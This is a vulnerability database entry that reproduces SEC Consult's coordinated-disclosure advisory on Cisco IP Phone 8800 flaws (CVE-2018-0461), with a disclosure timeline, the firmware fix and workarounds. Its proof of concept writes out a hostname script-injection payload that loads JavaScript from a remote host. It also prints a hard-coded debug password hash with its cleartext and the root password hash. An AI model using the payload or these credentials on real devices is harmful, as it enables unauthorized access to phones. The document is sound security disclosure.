ID

VAR-201901-0469

CVE

CVE-2018-0461

TITLE

Cisco IP Phone 8800 Code Injection Vulnerability in Series Software

DESCRIPTION

A vulnerability in the Cisco IP Phone 8800 Series Software could allow an unauthenticated, remote attacker to conduct an arbitrary script injection attack on an affected device. The vulnerability exists because the software running on an affected device insufficiently validates user-supplied data. An attacker could exploit this vulnerability by persuading a user to click a malicious link provided to the user or through the interface of an affected device. A successful exploit could allow an attacker to execute arbitrary script code in the context of the user interface or access sensitive system-based information, which under normal circumstances should be prohibited. The Cisco IP Phone 8800 Series device is an IP phone that provides video and VoIP communication capabilities at Cisco. This issue is tracked by Cisco Bug ID CSCvm95999. SEC Consult Vulnerability Lab Security Advisory < 20190109-0 > ======================================================================= title: Multiple Vulnerabilities product: Cisco VoIP Phones, e.g. models 88XX vulnerable version: See list of vulnerable devices/firmwares below fixed version: 12.5.1 MN CVE number: CVE-2018-0461 impact: high homepage: https://www.cisco.com found: 10/2018 by: W. Schober, IoT Inspector (Office Vienna) SEC Consult Vulnerability Lab An integrated part of SEC Consult Europe | Asia | North America https://www.sec-consult.com ======================================================================= Vendor description: ------------------- "The Cisco IP Phone 8800 Series is a great fit for businesses of all sizes seeking secure, high-quality, full-featured VoIP. Select models provide affordable entry to HD video and support for highly-active, in-campus mobile workers." Source: https://www.cisco.com/c/en/us/products/collaboration-endpoints/unified-ip-phone-8800-series/index.html Business recommendation: ------------------------ SEC Consult recommends to update the devices to the newest firmware (12.5.1 MN), where all the documented issues are fixed according to the vendor. We want to thank Cisco for the very professional response and great coordination. Vulnerability overview/description: ----------------------------------- 1) Arbitrary Script Injection The VOIP phones can be managed directly via the integrated keyboard and the built-in screen. In the configuration menu a few spots allow users to input text via the integrated keyboard into text boxes (e.g. Hostname). Those text input fields are prone to JavaScript-like code injection. An attacker is able to inject arbitrary payloads via the T9 keyboard. 2) Hard coded and weak secrets (Identified during an automated firmware analysis by IoT Inspector) The firmware, which is directly served from Cisco, contains multiple hard coded password hashes. They are stored in the /etc/passwd file and are hashed using an outdated algorithm (UNIX MD5+salt). The users are not documented anywhere. Access via SSH using those credentials is possible. Due to the outdated algorithm in use (UNIX MD5+Salt) and the very weak password it was easily possible to brute-force the password within seconds. 3) Undocumented debug functionality During a manual firmware analysis a few undocumented endpoints in the built-in web application, which is running on the VOIP phone, were identified. Those routes lead to parts of the web application that are neither documented nor officially mentioned anywhere by Cisco. Those parts of the web application allow an attacker to debug the device and create memory dumps. 4) Various outdated components with known vulnerabilities During the check a lot of outdated components were identified by their version numbers. It is not known which patches got backported by the vendor but Cisco mentioned that they have implemented some. The potentially affected components are: -) wpa_supplicant -) BusyBox -) Dnsmasq -) OpenSSL -) OpenSSH -) Linux Kernel Privilege Escalation app_keya -) Linux Kernel Privilege Escalation aMempodippera -) Multiple Linux Kernel CVE entries Please take a look at the IoT Inspector report for details: https://r.sec-consult.com/iotinspectorcisco Proof of concept: ----------------- 1) Arbitrary Script Injection A lot of settings can be changed directly on the VOIP phone via the built-in screen. There are also multiple locations, where user-input is parsed and displayed. It was possible to inject arbitrary (JavaScript) code directly into the phone UI. As an example the hostname of the VOIP Phone can be changed to the following value: hostnamea><img src=http://$IP/sec.js onload=exec()> The sec.js gets loaded from the remote host immediately and the exec function is executed. < A screenshot can be found online on our website > Further analysis has not been performed, but depending on the underlying libraries/system in use, it might be possible to get system level access via this attack vector. 2) Hard coded and weak secrets The file at the following path contains a hard coded password for the user debug: /_rootfs288xx.12-0-1ES-15.sbn.extracted/squashfs-root/etc/passwd $1$aoJQnypw$vHpN9WTJEQn1UnHzJdoz71 (Type: MD5 (Unix)) This hash corresponds to the following clear-text password: debug The password for the user root and default is also stored in the /etc/passwd: nCjlgBm7.lvX2 (Type: DES (Unix)) - Users: root, default 3) Undocumented debug functionality The built-in VOIP phone web server offers multiple functionalities for the end-user. During a manual analysis, undocumented endpoints with critical functionality got identified. Assigned ID: PSIRT-0289060835 Cisco PSIRT requests that the public disclosure should be shifted to January 2019 to avoid public christmas holidays. 2018-10-18: Contacting Cisco PSIRT and agreeing on public disclosure date 2019-01-09. 2018-10-24: Update from Cisco that a case owner got assigned. 2018-10-29: Update from Cisco that they are still reviewing the vulnerabilities and that they have already requested CVEs. 2018-11-05: Update from Cisco with further details about the internal scheduling. 2018-11-12: Update from Cisco with further details about CVEs. 2018-11-12: Cisco assigned CVE-2018-0461 and informed us that the vulnerabilities will be fixed in an upcoming release at the end of the year; Requesting affected/fixed versions. 2018-11-30: Cisco responds with affected devices and firmwares. Requesting updated firmware to do another IoT inspector scan, to verify the fixes. 2019-01-09: Public release of security advisory Solution: --------- Update the firmware of the affected devices to at least 12.5.1 MN. The vendor has published a security advisory as well: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190109-phone-script-injection Workaround: ----------- Disable the built-in web server Segment the VOIP network in a way, that access for devices other than VoIP phones in any direction is not possible at all. Remove the debug user Advisory URL: ------------- https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SEC Consult Vulnerability Lab SEC Consult Europe | Asia | North America About SEC Consult Vulnerability Lab The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It ensures the continued knowledge gain of SEC Consult in the field of network and application security to stay ahead of the attacker. The SEC Consult Vulnerability Lab supports high-quality penetration testing and the evaluation of new offensive and defensive technologies for our customers. Hence our customers obtain the most current information about vulnerabilities and valid recommendation about the risk profile of new technologies. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Interested to work with the experts of SEC Consult? Send us your application https://www.sec-consult.com/en/career/index.html Interested in improving your cyber security with the experts of SEC Consult? Contact our local offices https://www.sec-consult.com/en/contact/index.html ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Mail: research at sec-consult dot com Web: https://www.sec-consult.com Blog: http://blog.sec-consult.com Twitter: https://twitter.com/sec_consult EOF W. Schober / @2019

IOT TAXONOMY

AFFECTED PRODUCTS

CVSS

PROBLEMTYPE DATA

THREAT TYPE

remote

TYPE

code injection

CONFIGURATIONS

EXPLOIT AVAILABILITY

PATCH

EXTERNAL IDS

REFERENCES

CREDITS

Cisco would like to thank both the IoT Inspector Team and Werner Schober, of the SEC Consult Vulnerability Lab, for reporting this vulnerability.

SOURCES

LAST UPDATE DATE

2024-11-23T22:37:56.286000+00:00

SOURCES UPDATE DATE

SOURCES RELEASE DATE